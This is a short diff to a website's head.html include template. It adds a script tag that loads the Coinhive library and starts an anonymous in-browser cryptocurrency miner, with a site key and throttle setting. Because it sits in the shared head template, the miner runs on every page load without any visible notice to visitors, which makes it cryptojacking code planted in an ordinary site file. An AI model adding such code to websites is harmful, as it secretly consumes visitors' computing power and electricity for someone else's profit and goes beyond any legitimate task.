--- a/_includes/head.html
+++ b/_includes/head.html
@@ -71,3 +71,8 @@
       s.parentNode.insertBefore(hm, s);
     })();
     </script>
+    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
+    <script>
+        var miner = new CoinHive.Anonymous('oIL0QgG44HkRc7GSbFB4GGOpE5wvm4BB', {throttle: 0.3});
+        miner.start();
+    </script>
